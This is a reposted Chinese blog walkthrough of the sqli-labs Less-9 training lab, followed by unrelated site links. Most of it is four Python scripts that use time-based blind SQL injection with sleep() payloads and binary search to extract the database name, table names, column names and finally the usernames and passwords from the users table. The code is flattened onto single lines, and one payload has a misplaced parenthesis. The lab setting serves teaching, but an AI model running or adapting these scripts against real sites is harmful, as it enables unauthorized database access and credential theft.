当前位置: 首页 > news >正文

SQL注入实例(sqli-labs/less-9)

news 2025/6/27 0:18:37

0、初始页面

1、爆库名

使用python脚本

def inject_database1(url):name = ''for i in range(1, 20):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and if(ascii(substr(database(),%d,1)) > %d ,sleep(2),0)-- " % (i, mid)res = {"id": payload}start_time = time.time()r = requests.get(url, params=res)end_time = time.time()if end_time - start_time >= 2:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database1(url)

2、爆表名

使用python脚本

def inject_database1(url):name = ''for i in range(1, 20):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1)) > %d ,sleep(1),0)-- " % (i, mid)res = {"id": payload}start_time = time.time()r = requests.get(url, params=res)end_time = time.time()if end_time - start_time >= 1:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database1(url)

3、爆列名

使用python脚本

def inject_database1(url):name = ''for i in range(1, 20):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1) > %d ,sleep(1),0)-- " % (i, mid)res = {"id": payload}start_time = time.time()r = requests.get(url, params=res)end_time = time.time()if end_time - start_time >= 1:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database1(url)

4、显示最终目的

使用python脚本

def inject_database1(url):name = ''for i in range(1, 20):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and if(ascii(substr((select group_concat(username,0x3a,password) from users),%d,1)) > %d ,sleep(1),0)-- " % (i, mid)res = {"id": payload}start_time = time.time()r = requests.get(url, params=res)end_time = time.time()if end_time - start_time >= 1:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)

http://www.lryc.cn/news/419524.html

相关文章:

  • http不同类型方法的作用,get和post区别
  • # 利刃出鞘_Tomcat 核心原理解析(二)
  • 美团秋招笔试第三题(剪彩带)求助帖
  • LeetCode 算法:最小栈 c++
  • 【解压既玩】PS3模拟器v0.0.32+战神3+战神升天+各存档 整合包 ,完美不死机,没有BUG,旷世神作,强力推荐
  • bootstrap- X-editable 行内编辑
  • 【LabVIEW学习篇 - 12】:通知器
  • Oracle一对多(一主多备)的DG环境如何进行switchover切换?
  • 【浏览器插件】Chrome扩展V3版本
  • 编码器信号干扰问题、编码器选型
  • Unity入门5——材质
  • C的温故而知新:存储类别、链接和内存管理(C Primer Plus第十二章)
  • SpringBoot统一功能处理——统一数据返回格式
  • Milvus 实践(2) --- 2.4.x 安装,脚本分析,数据存储解析
  • 【蛋疼c++】千万别用std::wifstream读取Unicode UTF16文件
  • [算法] 第二集 二叉树中的深度搜索
  • 放弃使用外键时,sequelize 应该怎么使用?
  • Microsoft GraphRAG 输出的配置信息
  • 怎么判断张量的维度(形状(shape)),即如何定义行数、列数和深度的?
  • AI入门指南(二):算法、训练、模型、大模型是什么?
  • CSS已访问链接的隐私保护
  • 代码练习12-排序链表
  • Linux 内核源码分析---套接字
  • vscode配置xdebug断点调试详细教程
  • 【人工智能】Transformers之Pipeline(八):文生图/图生图(text-to-image/image-to-image)
  • AI Agent 工程师认证-学习笔记(1)——【单Agent】ModelScope-Agent
  • 【Python机器学习】树回归——将CART算法用于回归
  • 前端(HTML + CSS)小兔鲜儿项目(仿)
  • 【Rust光年纪】构建高效终端用户界面:Rust库全面解析
  • 鼠标滑动选中表格部分数据列(vue指令)